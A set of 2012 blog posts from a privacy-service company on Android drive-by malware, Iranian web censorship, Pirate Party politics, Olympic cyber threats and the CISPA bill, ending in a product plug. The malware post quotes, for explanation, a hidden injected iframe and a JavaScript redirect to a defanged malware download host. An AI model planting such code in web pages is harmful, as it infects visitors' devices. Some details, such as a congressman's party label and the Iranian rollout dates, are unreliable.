Friday 18 May 2012

Just when you thought it was safe to web surf on your Android device…

It might be safe to say that April 2012 will go down in history as the month we realized Macs are not virus-proof. If that’s the case, then May 2012 will go down as the month we realized smartphones aren’t safe either.

For the first time, experts have located legitimate sites that have been hacked and infected with Android drive-by-download malware.

“Drive-by-download” malware is harmful software that is automatically downloaded when a particular website is visited. In this case, the malware, a Trojan called NotCompatible, specifically infects Android devices. It’s important to note that the relevant piece of this story is the fact that the malware was found on legitimate websites that had been hacked and infected.

Hacked websites commonly have the following code inserted into the bottom of each page:

<iframe style="visibility: hidden; display: none; display: none;" src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

When a PC-based web browser accesses the site in question, it returns a “not found” error. When a browser with the word “Android” in its user-agent header accesses the site, however, the following is returned:

<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>

As a result, the browser immediately attempts to access the page at androidonlinefix.info. Like the previous site, only browsers with the word “Android” in their user-agent string will trigger a download; all other browsers will show a blank page. Since the server returns an Android app, the Android browser automatically downloads it. [ZDNet]

Up until now, the Android DBD Malware had been found only on websites designed by malware distributors specifically for the purpose of hosting the program. The fact that the software is now found on legitimate websites opens the door for large-scale infections.

Presently, the malware presents no known negative effects, but experts believe the current infections are part of a trial run to test the viability of mass distribution. 

Tuesday 15 May 2012

Iran’s War with the Internet

We’ve harped, at length, about the virtues of a free and fair internet. In fact, the freedom to use the web safely and anonymously is among the founding principles of SumRando. In the past few years, we’ve seen, among Western nations, hundreds of efforts to limit, alter or otherwise unbalance the internet we’ve come to know. But here’s the thing. The MPs, senators, chairmen and prime ministers suggesting these damaging changes have almost universally promoted these modifications from a position of good will. As much as it might be nice to vilify some of the morons who think DNS blocking and hyperlink censorship is a way forward, the fact is, they’re generally good people trying to correct an existing injustice. But what if that wasn’t the case? What if our leaders used the greatest communications platform the world has ever known to control and manipulate us? What if a free exchange of ideas was replaced with a party-sponsored propaganda machine where any exchange could be monitored by an authoritarian regime. What if this has already begun?

About 36 million Iranians use the internet

Just this past weekend, Iran’s Ministry of Telecommunications announced new regulations that forbid domestic communications firms, financial institutions and insurance firms from using email services like Gmail and Hotmail. Instead, these institutions will be allowed only to use the domain .ir for email and hosting. Furthermore, entities wishing to communicate with any of the affected institutions are now required to use addresses ending with iran.ir, chmail.ir, or post.ir.

Officially, the Ministry says the rules being implemented aim to curb the exposure of sensitive information to foreign entities that might do harm to national interests. However, these claims come after a report in April when Iranian minister for Information and Communications, Reza Taghipour said Iran intends to completely replace access to the world wide web with a national intranet by August. In the original plan, the intranet would be rolled out in two phases. Phase one was planned to be implemented in May and said to include the replacement of foreign email and search clients with services like Iran Mail and Iran Search Engine, leaving the majority of the internet still accessible. Sound familiar? The second phase was scheduled for April, when all access to the internet will be replaced by the state-run network. While recent moves aren’t as aggressive as the original plan (Iranian citizens still have full access to most services), they do follow the same line of national censorship.

Currently, the Iranian government denies plans to replace the internet entirely. They maintain that the recent regulations have been implemented solely to combat information leaks. But this denial is coming from a regime with a long history of online censorship and interference.

Image courtesy of CBS News
About 36 million of the 75 million Iranians use the internet, allowing electronic communication to play a vital role in the Green Party protests that shook the 2009 “re-election” of President Mahmoud Ahmadinejad. Since then, the government has cut internet connections, reduced connection speed and announced that social media platforms like Facebook and Twitter are anti-Islamic. It’s not exactly a stretch to imagine a move to complete censorship.

The fact is, the free, instantaneous exchange of ideas provided by the internet is a threat to regimes that seek absolute control. By controlling transmission, authoritarian regimes hope to curb the rising voices of revolution. And while it’s not clear whether Iran will move forward on blocking access to all of the internet, it’s safe to expect increased censorship and restrictions in coming months.

Thursday 10 May 2012

The Hague censors political party in the name of copyright protection

It’s no secret that European governments are banding together against file sharing websites. Just last month, (joining neighboring countries) UK courts ordered ISPs to block access to The Pirate Bay. But the Dutch have just taken these efforts a step further. In early May, a high court in The Hague has ordered ISPs to block user access to the file-sharing site. But here’s where things get interesting. In a move that can only be described as a flagrant violation of free speech, courts in the Netherlands have also ordered the burgeoning Pirate Party to take down instructions for circumventing the ISPs blocking measures.


According to the Dutch Pirate Party Blog:

In point ii) of the verdict the Pirate Party is ordered ‘to cease & desist presenting direct links to other TPB dedicated proxies.’
This prohibition seems to cover the whole *.piratenpartij.nl domain. We have to comb every inch of our site, including our blog, to make sure we have no links to sites such as geenstijl.nl (Dutch news weblog) or rechtspraak.nl (Dutch law weblog). If we would want to try and risk €10.000, we could try and see what exactly is meant by ‘direct links’.
Point v) bids te Pirate Party ‘to cease & desist placing lists with internet addresses which can be used to circumvent the block of TPB, on her subdomain tpb.piratenpartij.nl.’
Apparantly it is now forbidden to direct people to the Tor project’s download page, or even the Opera browser’s page.

Nobody here at SumRando is going to argue that illegal file-sharing is acceptable. But it should go without saying that violating basic rights like freedom of expression in order to enforce copyrights is wildly unacceptable. Blocking access to websites like the Pirate Bay is debatable, but censoring a fast-growing political party isn’t. 

Saturday 5 May 2012

Pirates are raiding elections in Germany, is your political system next?

In just the past few years, we’ve seen the Protect IP Act, the Stop Online Piracy Act, the Anti-Counterfeiting Trade Agreement, and countless other pieces of legislation around the world billed as the solution to digital crime. But every time one of these proposals is brought to the public, the backlash is swift and severe. And thank goodness for that. While each one of these political devices sought to bring increased legitimacy to online business – particularly with regards to copyright infringement and creative rights – in reality, they would bring an end to the free internet as we know it; decimating free speech, destroying security, and opening the gates for warrantless surveillance. So, is it safe to say that politicians are out of touch with the internet?

Maybe not.

Introducing: The Pirate Party. They don’t have eye patches (as far as we know) and they’re not after your booty, but many of them are hackers and their next target is your political system.

Origins

The Pirates first set sail in 2006 when Swedish political evangelist Rick Falkvinge was able to rally members of his bourgeoning party against the police raid on the Pirate Bay’s file sharing servers. Using a platform in support of copyright reform (anti-DRM, anti-software patents), and government transparency, the Pirates were able to amass a critical number of members – enough to convince a coalition of left-wing political parties to adopt their policies and enough to return a Swedish member of the European Parliament to office under their flag.

Yar! We'll plunder, pillage and win seats in Parliament!
But the winds really picked up last September when the Pirates won their first seats in a state parliament after capturing 8.5% of the vote in Berlin state elections and then more seats in March in the Saarland region elections. While many considered the Berlin elections to be a temporary political fluke, the victories in Saarland secured the Pirates as a legitimate party and force for change in German politics.

Presently, the Pirates are polling around 9% in the two regions that will be holding state parliamentary elections in May – substantially more than the 5% minimum to be awarded seats. Current numbers estimate the Pirate Party is now Germany’s third most popular party.

So what do Pirates stand for anyway?

The pirates run on a platform of open information. Government transparency and accountability, free file sharing and digital freedom (anti-ACTA, for example) are all major campaign points. In fact, the Pirates are so dedicated to transparency that they will only go into coalition negotiations with parties that agree to livestream the negotiations online – allowing anyone to see and understand the deals being cut.

But beyond policy, the Pirates are also taking aim at the system itself. The concept involves using the connectedness of the internet to actually transform the ways political decisions are made. This is where an innovative piece of software called Liquid Feedback comes into play.

Liquid Feedback is a software package and online forum that allows party members to have constant and equal input in party and policy decisions. The program offers members the opportunity to voice opinions, draft legislation, and help make party decisions. The concepts fleshed out in Liquid Feedback are then brought to official party meetings where those in attendance vote on them. It even uses algorithms to evaluate party opinion on certain issues. As a Pirate Party member, you could feasibly have input in every decision the party makes. But here’s where things get really interesting. Since most members likely don’t have the time or desire to actively participate in every decision and every piece of legislation the party makes – that’s why we have elected representatives – a member can actually delegate their votes to other members based on expertise or influence. Members can delegate all their votes, or only votes on specific issues. The Pirates have essentially created a gray area between direct and representative democracy where each voter gets to decide their own level of participation.

What’s next

The problem with the Pirate Party in its current form is its lack of definition on issues outside the internet and transparency. They don’t have an official stance on many issues pertaining to major topics like immigration, the economy, or foreign policy. But despite these ambiguities, expect the Pirates to play a major role in German and pan-European politics for the foreseeable future. At present count, there are Pirate Parties registered in over 40 countries. As we’ve seen, even in countries where they aren’t winning seats in parliament, they’re influencing policy. And as long as the long established parties keep pushing dangerous digital policies like ACTA and SOPA, expect the Pirates to continue waving their flag.

Friday 4 May 2012

Officials expect onslaught of Cyberattacks at 2012 Olympics

British Cabinet Office minister Francis Maude said that the 2012 London Olympics will not be “immune” to cyber attacks.

Hacktivist group Anonymous is already rallying members
Well, there’s a big surprise. Assuming that “not immune” doesn’t mean, “oops, we totally forgot about that whole cybersecurity thing”, it’s a pretty fair thing to say. After all, as we should know by now, nobody is impervious to cybercriminals. NOBODY.

To the credit of Maude and the Olympic organizers, tech teams have been running security tests since March – simulating different kinds of attacks they might encounter during the games. And while the range of attacks that could be launched at such a massive target like the Olympic games is gigantic and the Organising Committee is focusing a huge range of possibilities, some of the biggest threats include distributed denial of service (DDoS) attacks against the official website and attacks that could actually disrupt the games themselves (think power outages).

You might be thinking at this point, “How many people could really want to attack the Olympics?” In 2008, the games in Beijing were subject to about 12 million attacks per day. To put that in perspective, the U.K. government’s sites and servers are attacked about 600 times per day. That’s a pretty massive increase and it’s safe to say that authorities are going to be dealing with threats on an unprecedented level.

"High-end cybersecurity solutions that were used 18 months ago by a limited number of organisations to protect their networks may already be out in the open marketplace - giving cybercriminals the knowledge to get round these protective measures…. Our responses have to be fast and flexible. What works one day is unlikely to work a matter of months or even weeks later." [BBC]

And remember, though 2008 wasn’t all that long ago, the range and severity of cyber attacks has changed dramatically. Back then, few had heard of Anonymous, Macs didn’t get viruses, and digital watches were still pretty neat. 2012 is going to be a whole new ballgame and hopefully the brains behind the organizers are ready for some curveballs. 

Thursday 3 May 2012

CISPA passes in U.S. House, what’s next?


Despite veto threats from the White House, the U.S. House of Representatives passed the controversial CISPA cybersecurity bill on Thursday. But how important is this bill and how might it affect Americans’ privacy?

What is CISPA?

The Cyber Intelligence Sharing and Protection Act (HR 3523) was authored in an attempt to enhance the ability of U.S. based companies that own a large part of the nation's infrastructure with the Federal government in matters of digital security and potential attacks. Advocates of the bill point to countries like Russia and China who regularly use hacking methods to extract information from corporate and U.S. government servers.

The bill amends the National Security Act of 1947 (which, obviously, doesn’t mention cybersecurity), giving private companies the ability to willingly share your digital information with the government.

What to the proponents say?

Proponents argue that as espionage moves to the web, the United States must have a digital communications infrastructure in place that will allow businesses and government bodies to effectively and efficiently combat a hostile digital presence. Being able to share vital user information about potential or ongoing attacks could be vital in such a circumstance.

Congressman Mike Rogers (D-MI), who authored the bill, released a press release on Thursday.

By permitting the private sector to expand its own cyber defense efforts and to use classified information to protect its systems and networks, this bill will help create a more robust cybersecurity marketplace with expanded service offerings and jobs. More importantly, this bill does not contain any new federal spending or impose additional federal regulation or unfunded mandates on the private sector. [Congressman Mike Rogers]

What do opponents say?

Opponents say the bill is too vague, ripe for abuse, and tramples on existing privacy laws. Particular attention has been given to a clause that states "notwithstanding any other provision of law," companies may share information "with any other entity, including the federal government.” By using the word “notwithstanding”, CISPA can trump any local, state, or federal law that would otherwise stand in the way of information sharing – including laws that prohibit warrantless surveillance.

Furthermore, the Electronic Frontier Foundation has put particular criticism on what they describe as vague definitions and say that despite amendments, CISPA leaves the government and companies with too much leeway.

Even after amendments, “Cybersecurity system" defines the system that “cybersecurity providers” or self-protected entities use to monitor and defend against cyber threats. This is a “system” intended to safeguard “a system or network.” The definition could mean anything—a Local Area Network, a Wide Area Network, a microchip, a website, online service, or a DVD. It might easily be stretched to be a catch-all term with no meaning. For example, it is unclear whether DRM on a DVD constitutes a “cybersecurity system.” And such a “cybersecurity system” is defined to protect a system or network from “efforts to degrade, disrupt or destroy”—language that is similarly too broad. Degrading a network could be construed to mean using a privacy-enhancing technology like Tor, or a p2p protocol, or simply downloading too many files. [EFF]

What will happen next?

Next, the bill will go to the Senate where it is expected to come up for a vote in May. Should it pass, it will then move to the President’s desk. Although President Obama has already threatened a veto, several amendments have been made since the threat was issued and some question whether they might change the President’s decision down the road.

Why is all this important?

Whether or not CISPA passes is largely irrelevant, the fact is, we live in a changing world. As our bank accounts and personal profiles expand their online presence, governments and companies – and even cybercriminals – are going to have open access to your information.

When all is said and done, what you do online is NOT private information. But, if you take the proper precautions, it can be. Using common sense, virus protection and SumRando, you can keep your information safe.